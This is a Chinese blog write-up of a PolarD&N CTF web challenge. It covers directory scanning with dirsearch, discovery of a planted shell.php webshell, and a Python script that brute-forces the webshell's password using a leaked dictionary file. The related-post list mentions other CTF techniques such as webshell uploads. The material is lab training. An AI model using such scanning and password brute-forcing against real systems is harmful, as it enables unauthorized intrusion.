PolarD&N_CTF_WEB_被黑掉的站

已于 2023-10-12 21:07:58 修改
阅读量284 收藏 2
点赞数
分类专栏: CTF靶场分享 文章标签: 前端
于 2023-10-12 20:05:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62626298/article/details/133797567
版权

题目地址PolarD&N_CTF官方靶场

BP爆破

1.首先进网站看一下i

提示说现在站中还有很多马

我们用kali中dirsearch来扫描一下本站目录

dirsearch -u url -e .php

可以看出现在站中有一个bak备份文件和一个shell.php的木马

先访问一下shell.php

是一个登录网页

随便输入密码,打开bp抓包看一下

传递了一个参数pass

再打开备份文件看一下

好像是一个密码字典,

使用bp爆破一下试试

攻击后得到flag

python爆破

# -*- coding: utf-8 -*-
import requests
import re

url = "http://3a64e7b0-36a0-438c-b787-e85769cf434d.www.polarctf.com:8090/shell.php"
f = open('index.php.bak')#字典位置
payload = f.readlines()#读取字典内容

for i in payload:

    i = i.strip();#去除换行符

    data = {'pass':i}

    response = requests.post(url=url,data=data)

    if 'flag' in response.text:

        print(data)

        print(re.findall(r'flag{.*?}',response.text)[0])
python pass.py

加冕@
关注
专栏目录
PolarD&N-CTF-web方向-困难_polard&n 没人能拒绝猫猫 ctf(2)
2401_84263282的博客
05-04 676
横线中共20个字符,可以用四个phtml进行字符串逃逸,所以这样构造应该就能出答案了。那么我们构造payload:?passwd=;s:6:passwd;i:1;s:4:“sign”;然后就在源码中找到了flag。
PolarD&N-CTF-web方向-困难_polard&n 没人能拒绝猫猫 ctf
m0_61068088的博客
04-06 750
然后就得到了flag。
polar CTF web
samRsa
01-02 666
polar CTF web 看到shell.php和index.php.bak。一看就是爆破,字典都给了,最后得到为。1、dirsearch 扫目录。
记异常CTF解题 PolarCTF-WEB-被
weixin_64164950的博客
10-13 174
用bp字典爆破密码直接拿flag。掏出dirsearch扫扫扫。
PolarD&N_CTF_WEB_反序列化
weixin_62626298的博客
10-13 235
在这个代码中,创建了一个example类,一个process类,example类中有一个变量$handle,一个魔法函数__destruct(),魔幻函数中调用了函数funnnn,然而根据funnnn中的函数显示,变量handle调用了prcocess类的方法,这说明handle变量是一个process类的实例对象。需要通过get方法输入的是一个data值,而且data值在传递进去之后,会先被反序列化一下,序列化只会保存对象的所有变量。1.必须让handle变量是一个process类的实例化对象。
PolarD&N-CTF-web方向-简单
J1ng_Hong的博客
12-06 2969
所以bp的方法就不行了。然后源码看了好久都没找到id=9的地方,并且我还尝试传入id这个参数。post传参一个yyds=666,这是不会被检测的。这就是说我们需要post一个名为xdmtql的变量,然后这个变量不能是数组。然后发现有一个index.php,然后发现根目录有一个flag的文件。然后发现了一个叫做/.index.php.swp的备份文件。这就说明,如果换行符应该是不会被检测的。虽然很多乱码,但是flag还是包含在里面的。要匹配 . ,请使用 \.。然后就得到了flag。然后就得到了flag。
polarctf靶场【web】swp、召唤神龙、浮生日记、干正则
m0_73981089的博客
05-07 1219
swp,jsfuck编码解密,xss,preg_match()函数绕过,parse_str变量覆盖
Polar D&N misc_0和255
yufeng0990的博客
12-04 625
0和255 writeup 仅自己可见
搭建ctfd动态靶场
qq_35948609的博客
11-25 4331
搭建CTFd动态靶场
DriverManager 源码分析
u011385186的专栏
12-26 1000
1. Class.forName("com.mysql.jdbc.Driver"); 在初始化的时候会执行注册当前Driver给DriverManager static { try { java.sql.DriverManager.registerDriver(new Driver()); } catch (SQLException
Web】记录Polar靶场<简单>难度题一遍过(全)
uuzeray的博客
04-01 2268
明天XYCTF开始,今天干啥也不是,过过签到八股吧。
polarctf靶场【web】login、被、GET-POST、网、robots
m0_73981089的博客
04-26 887
sal查询,bp爆破,目录扫描,get-post简单传参
PolarCTF(部分)后续会更新
最新发布
2301_80727080的博客
07-13 676
你要在传参时传入一个名为flag的参数,其值不能为flag,但在后续变量覆盖的时候,要让变量flag值仍然等于flag{f73da0c8e7c774d488a6df0fec2890d9},也就是不改变变量flag的值。这一步按我的理解是将get传入的参数flag赋值为flag,而我们get传入的参数flag值为xxx,那么它就会被覆盖为flag,所以才说get传入flag=xxx(任意值)第二个foreach是遍历get传进来的参数,$key为键,$value为值,假设传的是user=admin。
PolarD&N(swp)
果粒程
04-15 813
根据提示去找swp文件,首先了解什么是swp文件swp即swap(交换分区)的简写,在编辑文件时产生,它是隐藏文件。这个文件是一个临时交换文件,用来备份缓冲区中的内容。类似于Windows的虚拟内存,就是当内存不足的时候,把一部分硬盘空间虚拟成内存使用,从而解决内存容量不足的情况。如果文件正常退出,则此文件自动删除。如果并没有对文件进行修改,而只是读取文件,是不会产生swp文件的.swp的产生1.当你用多个程序编辑同一个文件时。
PolarD&N(简单rce)
果粒程
04-16 639
外链图片转存失败,源可能有防盗链机制,建议将图片保存下来直接上传(img-i7IKevHK-1681605902192)(D:\网安笔记\图片\image-20230415190913908.png)]
PolarD&N】刷题记录2
青青很OK的博客
04-02 775
当通过POST方式传递name变量的值,会被存入到session中,会在/tmp目录下存储session的值。第二个file是文件包含,php文件会被执行,然后file那边过滤了base加密等方式。1.查看代码,提取精华:get请求让id=1,post请求jljcxy=flag。2.随便输入点东西,然后提交查询,发现没有东西。6.开始攻击,等待完成后按照长度排序,然后查看内容,获得flag。2.抓个包看看,发现了base32,解码发现是一个目录。1.查看页面,很经典的上传页面,上传个一句话木马看看。
PolarCTF2024冬季个人挑战赛wp含web、misc、crypto_polar冬季赛
Python毕设源码程序王哥
04-12 787
乱码,火狐浏览器ALT->查看->修复乱码,得到一个被加密的文件名,base64解密得到index.phps参数sys不能等于xxs,但是经过url编码的sys可以等于xxs,先让浏览器进行转码,%25->%,%78->x,就能实现(emmm,附件的内容其实就是乱码修复后的)
Polar D&N Misc 大礼包 题解
qq_43123822的博客
10-15 398
1.根据加密压缩包的注释得出密码是6位以上,用ARCHPR工具限定纯数字,7-8位爆破得到密码“9635421”。5.用key=2的栅栏密码解密后发现格式正确了,但是具体的字符不对,那就考虑一下凯撒密码。Polar D&N靶场,CTF题目多样,题目完全原创,不定期开展各种赛事,欢迎各位来刷题!4.再拿base64进行解码,能看出和正常flag格式不同,那就再拿栅栏密码解密。6. 当key=13时,能发现所有的条件都满足了,直接提交flag,然后就C了!打开该图片,在文件末尾可看到一串base32编码。
PolarD&N-CTF-web方向-困难
J1ng_Hong的博客
12-13 1922
或者在payload中更改不可见字符为%00也可以,但是flag不在当前目录,wp说flag在上一级目录,那么我们payload中要读取的是../flag.php就可以了。
polarD&N2023秋季个人挑战赛MISC
m0_61025358的博客
12-08 1632
CTF竞赛是安全圈喜闻乐见的竞赛模式,对于培养网络安全技术人才起到了很重要的作用。CTF起源于1996年DEFCON全球客大会,是Capture The Flag的简称。经过多年的发展,CTF这种比赛形式已经日益成熟。 MISC(Miscellaneous)类型,即安全杂项,题目或涉及流量分析、电子取证、人肉搜索、数据分析等等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值